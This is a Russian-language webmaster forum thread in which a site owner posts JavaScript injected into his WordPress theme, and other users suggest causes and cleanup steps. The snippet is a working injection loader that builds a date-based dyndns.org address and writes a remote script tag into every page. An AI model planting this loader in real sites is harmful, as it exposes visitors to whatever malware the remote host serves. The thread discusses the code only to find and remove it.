Вредоносный код на Wordpress

12
Neptoon
На сайте с 12.07.2011
Offline
126
1192

Вчера поставил рекламу от Пингмедиа, а сегодня Гугл выдал сообщение, что на сайте вредоносный код.

Нашел этот код в одном из js файлов шаблона WP

Вот код


var domain = 'http://fra';
var end = 'dyndns.org';
var date = new Date();
var current_date = date.getDate();
var current_month = date.getMonth() + 1;
var params = 'rsize.js';
domain = domain + current_date + current_month + '.' + end +
'/' + params;
document.write('<script language="JavaScript" type="text/jav
ascript" src="'+domain+'"></scr'+'ipt>');

Это может быть как-то связано с установкой рекламных кодов или откуда могли появится эти строки?

Drive your way
R
На сайте с 24.01.2008
Offline
180
#1

Пингмедиа тут не причем, у вас скорей всего точно вирус.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
wek000
На сайте с 25.11.2007
Offline
219
#2

Откуда WP скачивали?

Советую качать от сюда http://ru.wordpress.org/

Очень часто клиенты непонятно откуда скачивают дырявые или вирусные WP

Neptoon
На сайте с 12.07.2011
Offline
126
#3
Rxp:
Пингмедиа тут не причем, у вас скорей всего точно вирус.

А как он мог попасть? Узнали фтп пароли или через дыры в скриптах?

---------- Добавлено 30.05.2012 в 23:20 ----------

wek000:
Откуда WP скачивали?
Советую качать от сюда http://ru.wordpress.org/

Отсюда и скачивал

wek000
На сайте с 25.11.2007
Offline
219
#4

каспер ругается при заходе на ваш сайт?

facegrodno
На сайте с 02.05.2009
Offline
45
#5

в самом начале года поднималась тема, что ломают хостеров (3 января на серче поднялась "куча").

столкнулся с аналогичной проблемой, когда ломанули один сайт на серваке, а передалось всем аккам. общайтесь с хостером, если они признают свою ошибку (если с вашей стороны все "чисто")

Партнерка кино и развлекательное (http://u.to/BrgYAQ) Новая Кинопартнерка (http://goo.gl/tXuaC) NEW Май 2012
Neptoon
На сайте с 12.07.2011
Offline
126
#6
wek000:
каспер ругается при заходе на ваш сайт?

нет, тот код я уже удалил

---------- Добавлено 31.05.2012 в 09:40 ----------

facegrodno:
в самом начале года поднималась тема, что ломают хостеров (3 января на серче поднялась "куча").

столкнулся с аналогичной проблемой, когда ломанули один сайт на серваке, а передалось всем аккам. общайтесь с хостером, если они признают свою ошибку (если с вашей стороны все "чисто")

с хостером общался (фаствпс). говорят, что с их стороны все нормально

Как быть? Пароли-то поменял, но поможет ли.

A
На сайте с 04.01.2012
Offline
8
#7

Может имеет смысл сделать бэкап базы и заново систему установить?

Строим сайт своими руками. Бесплатные видеоуроки по WordPress, SEO и монетизации (http://wp-voprosov.net)
H
На сайте с 31.05.2012
Offline
47
#8
Neptoon:
Нашел этот код в одном из js файлов шаблона WP

когда переходите по адресу сайт.ру/wp-admin/js какую страницу показывает?

Neptoon
На сайте с 12.07.2011
Offline
126
#9
Hebe:
когда переходите по адресу сайт.ру/wp-admin/js какую страницу показывает?

Lord_Leon
На сайте с 04.03.2010
Offline
63
#10

Помогал клиенту решать данный вопрос.

1) Можно скачать любой js себе на компьютер, у меня авг сразу вирусы видит.

2) Или через фтипи проверить дату жабаскриптов если она отличается от остальных пхп файлов значит вирус есть.

P.S. Может в скрипте Пингмедиа была дырка вот и взломали через нее.

З.Ы. Решал проблему установкой заново WP + увеличил пароль на фтипи до 12 символов (как минимум) + пароль к базе данных увеличивал. Файл логин вообще стоит закрыть, если на сайт через админку входите только вы.

Промышленный дизайн (https://aicogroup.ru/portfolio/industrial-design) корпуса для рэа | Крипозащита данных, создание сайтов (https://aicogroup.ru/portfolio/sozdanie-saytov).
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий